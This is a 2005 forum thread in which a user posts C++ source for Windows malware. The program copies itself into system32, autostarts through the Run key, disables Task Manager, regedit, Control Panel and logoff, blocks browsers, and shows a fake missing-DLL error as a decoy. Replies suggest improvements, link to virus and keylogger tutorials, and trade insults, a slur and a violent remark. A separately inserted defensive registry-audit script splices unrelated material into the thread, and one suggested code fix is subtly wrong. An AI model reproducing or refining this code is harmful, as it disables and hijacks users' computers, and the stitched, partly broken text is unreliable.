Posted August 12, 2005

What do you think? I know, it sucks, but I just started learning how to use the API. Ezreg.h is a header made by me, it just allows me to use one function creating keys and such, instead of declaring a key, as well as creating, and setting values.

#include <windows.h>
#include <ezreg.h>
#include <stdio.h>

void virus()
{
    // Virus Code Here
}

void cure()
{
    remove("C:\\WINDOWS\\system32\\win32.exe");
    EzRegDel(HKLM,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run","021SYS");
    EzRegDel(HKCU,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System","DisableTaskMgr");
    EzRegDel(HKCU,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System","DisableRegistryTools");
    EzRegDel(HKLM,"SOFTWARE\\Microsoft\\MediaPlayer","Counter");
    EzRegDel(HKCU,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer","DisallowRun");
    EzRegDel(HKCU,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\DisallowRun","1");
    EzRegDel(HKCU,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\DisallowRun","2");
    EzRegDel(HKCU,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\DisallowRun","3");
    EzRegDel(HKCU,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\DisallowRun","4");
    EzRegDel(HKCU,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System","Wallpaper");
    EzRegDel(HKCU,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer","NoRun");
    EzRegDel(HKCU,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer","NoControlPanel");
    EzRegDel(HKCU,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer","NoClose");
    EzRegDel(HKCU,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer","NoFind");
    EzRegDel(HKCU,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer","NoLogoff");
    MessageBox(NULL, "Virus Removed!", "CHRON VIRUS", MB_OK | MB_ICONEXCLAMATION);
}

int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow)
{
    int count;
    int tempint;
    char path[200];
    char name[20];
    char antidote[20];
    char filename[100];
    char buffer[2];

    strcpy(filename,"C:\\WINDOWS\\system32\\win32.exe");
    strcpy(antidote,"cure.exe");
    GetModuleFileName(NULL,path,sizeof(path));
    for (count = strlen(path); path[count] != '\\'; count--);
    tempint = count+1;
    for (count = tempint; count <= strlen(path); count++)
        name[count-tempint] = path[count];

    if (strcmp(path,filename) != 0 && strcmp(name,antidote) != 0){
        if (!EzRegIf("SOFTWARE\\Microsoft\\MediaPlayer","021SYS",REG_SZ)){
            EzCopy(path,filename);
            EzRegCr(HKLM,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run","021SYS",filename);
            EzRegCrD(HKCU,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System","DisableTaskMgr",0x00000001);
            EzRegCrD(HKCU,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System","DisableRegistryTools",0x00000001);
            EzRegCrD(HKCU,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer","DisallowRun",0x00000001);
            EzRegCr(HKLM,"SOFTWARE\\Microsoft\\MediaPlayer","Counter","5");
            EzRegCr(HKCU,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\DisallowRun","1","regedit.exe");
            EzRegCr(HKCU,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\DisallowRun","2","iexplore.exe");
            EzRegCr(HKCU,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\DisallowRun","3","firefox.exe");
            EzRegCr(HKCU,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\DisallowRun","4","winamp.exe");
            EzRegCr(HKCU,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System","Wallpaper","C:\\WINDOWS\\winnt.bmp");
            EzRegCrD(HKCU,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer","NoRun",0x00000001);
            EzRegCrD(HKCU,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer","NoControlPanel",0x00000001);
            EzRegCrD(HKCU,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer","NoClose",0x00000001);
            EzRegCrD(HKCU,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer","NoFind",0x00000001);
            EzRegCrD(HKCU,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer","NoLogoff",0x00000001);
        }
        MessageBox(NULL, "A required .DLL file, OCXMENT32.DLL, was not found.", "Error", MB_OK | MB_ICONERROR);
    }
    // On startup.
    else if (strcmp(path,filename) == 0){
        buffer[1] = 0;
        EzRegQu(HKLM,"SOFTWARE\\Microsoft\\MediaPlayer","Counter",buffer);
        if (buffer[0] != '0'){
            buffer[0] = buffer[0]-1;
            EzRegDel(HKLM,"SOFTWARE\\Microsoft\\MediaPlayer","Counter");
            EzRegCr(HKLM,"SOFTWARE\\Microsoft\\MediaPlayer","Counter",buffer);
        }
        else
            virus();
    }
    // To cure.
    else if (strcmp(name,antidote) == 0)
        cure();
}

EDIT: Sorry if it's out of line, it doesn't paste properly into the form.
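A defender's check for the registry changes listed in the post above, as an added example that is not part of the original thread: it scans the text of a `reg export` dump for the policy values and the Run entry that the posted program sets. The function name, the reason strings and the sample export are constructed for illustration.

```python
import re

# Value names taken from the program posted in this thread.
POLICY_FLAGS = {
    r"policies\system": {"disabletaskmgr", "disableregistrytools"},
    r"policies\explorer": {"disallowrun", "norun", "nocontrolpanel",
                           "noclose", "nofind", "nologoff"},
}
KEY_RE = re.compile(r"^\[(.+)\]$")
VAL_RE = re.compile(r'^"([^"]*)"=(.*)$')

def audit_reg_export(text):
    """Return (key, value_name, data, reason) tuples worth reviewing."""
    findings, key = [], ""
    for line in text.splitlines():
        line = line.strip()
        k, m = KEY_RE.match(line), VAL_RE.match(line)
        if k:
            key = k.group(1).lower()
        if not m:
            continue
        name, data = m.group(1), m.group(2)
        for suffix, names in POLICY_FLAGS.items():
            enabled = data.lower().startswith("dword:") and int(data[6:], 16) != 0
            if key.endswith(suffix) and name.lower() in names and enabled:
                findings.append((key, name, data, "restrictive policy enabled"))
        if key.endswith(r"policies\system") and name.lower() == "wallpaper":
            findings.append((key, name, data, "wallpaper forced by policy"))
        if key.endswith(r"policies\explorer\disallowrun"):
            findings.append((key, name, data, "program blocked from running"))
        if key.endswith(r"\currentversion\run"):
            findings.append((key, name, data, "autorun entry: verify target"))
    return findings

# Constructed sample in .reg text form (real exports are UTF-16; decode first).
SAMPLE = r"""
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"021SYS"="C:\\WINDOWS\\system32\\win32.exe"
[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System]
"DisableTaskMgr"=dword:00000001
[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"NoDriveTypeAutoRun"=dword:00000091
"NoRun"=dword:00000001
[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun]
"1"="regedit.exe"
"""

if __name__ == "__main__":
    print(*audit_reg_export(SAMPLE), sep="\n")
```

Every Run entry is reported for review rather than judged, since legitimate software uses the same key; the policy values are reported only when set to a non-zero DWORD.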

August 13, 2005 Author
Scr33n0r said: Don't code a virus in VB, ain't going to work. You are a fucking n00b aren't you. Trying to be cool. It's not fucking VB, retard. It's C++.

August 13, 2005
Scr33n0r said: Don't code a virus in VB, ain't going to work.
hahaha fucking idiot.

August 13, 2005
Quote: strcpy(filename,"C:\\WINDOWS\\system32\\win32.exe");
u should do GetSystemDirectory(filename, sizeof(filename)); strcpy(filename, "\\win32.exe"); in case he runs on an older version of windows
Quote: EzRegCr(HKLM,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run","021SYS",filename);
is this the line that starts the virus when the computer starts?
here's a good site where i learned how to write my first virus =) http://www.madchat.org/vxdevl/vxmags/rrlf5/tutorials/cpp_org.htm and here's a site to make ur first keylogger http://www.infosecwriters.com/hhworld/hh2.php

August 13, 2005 Author
Quote: GetSystemDirectory(filename, sizeof(filename)); strcpy(filename, "\\win32.exe");
Oh! nice. I didn't realize you could do that. Thanks Urza, and thanks for the links.

August 13, 2005
Erondial said: Oh! nice. I didn't realize you could do that. Thanks Urza, and thanks for the links.
lol no prob...u could also add something to piss em off like BlockInput(TRUE); Sleep( a long amount ); but that u could stop by pressing ALT + CTRL + DEL

August 13, 2005
http://vx.netlux.org/lib/vml01.html Please read that (Learn assembly first). If you understand the whole book, you can then call yourself a haxor. The most important part for you to read right now, might be http://vx.netlux.org/lib/vml01.html#c18

August 13, 2005 Author
He probably read the other thread, and tried to go with the flow, trying to act cool and knowledgeable, saying VB sucks, when he doesn't actually know anything at all about any language. ViperX, uh... 1995. Isn't that slightly old? But whatever, I'll still read it. The author is quite odd, being both ridiculously republican and ridiculously liberal at the same time. I'm sure it'll be interesting.

August 13, 2005
is a virus still a virus if it doesn't spread itself, the definition was always fuzzy for me nice looking program

August 13, 2005
Correct definition of a computer virus: A computer virus is a program that reproduces its own code by attaching itself to other programs in such a way that the virus code is executed when the infected program is executed. A trojan: A program that appears desirable but actually contains something harmful.

August 13, 2005
greeneyes said: is a virus still a virus if it doesn't spread itself, the definition was always fuzzy for me nice looking program
No, a virus by definition replicates and spreads.

August 13, 2005 Author
Not necessarily to another computer though. Like in my virus, where it just spreads to the windows folder, and lies there.

August 13, 2005
a virus that spreads has an increased chance of being caught and sent to Anti virus companies. and BlockInput(TRUE); blocks input from mouse and keyboard

August 24, 2005 Author
Does a lot of things. Won't let you run firefox, winamp or regedit (registry editor), disables the task manager, puts in another key that won't let you use regedit, copies itself to your system folder, puts a key in so it runs every time on startup, which causes a message box saying: "isn't windows fun?" to pop up and not close down, takes out your log out buttons, takes out your shutdown menu, won't let you access the control panel, changes your desktop to the windows logo, and won't let you change it back... I think that's about it. :)

August 24, 2005
well...
Quote: Not necessarily to another computer though. Like in my virus, where it just spreads to the windows folder, and lies there.
ViperX never said from computer to computer...that's a worm. a virus basically 'injects' or 'patches' into/programs so they execute the virus's code instead of or along with their programs' directives. if it spreads to other folders then it's just a piece of crap 'omg i waz haxrd' wannabe virus. k?

August 30, 2005
Partisan said: omg hax!
You get unbanned and this is what you do with your account...

August 30, 2005
Erondial said: Not necessarily to another computer though. Like in my virus, where it just spreads to the windows folder, and lies there.
Then it isn't a virus. It is just like spork. It is a program that fuxx0rz j00r PC. But I guess it is nice. And VB does suck. But I've never coded C++ in my life and knew this wasn't VB. I have to take a goddamned VB class at school.

August 30, 2005
Scr33n0r said: Don't code a virus in VB, ain't going to work.
what you just said rages me so much I want to fucking kill you. you realize that 80% of the best trojans are written in VB? VB is a powerful language but in my eyes C++ is far more powerful but harder to use. die k.

August 31, 2005 Author
MichaelJackson said: what you just said rages me so much I want to fucking kill you. you realize that 80% of the best trojans are written in VB? VB is a powerful language but in my eyes C++ is far more powerful but harder to use. die k.
YOU HAVE JUST RAGED ME, K?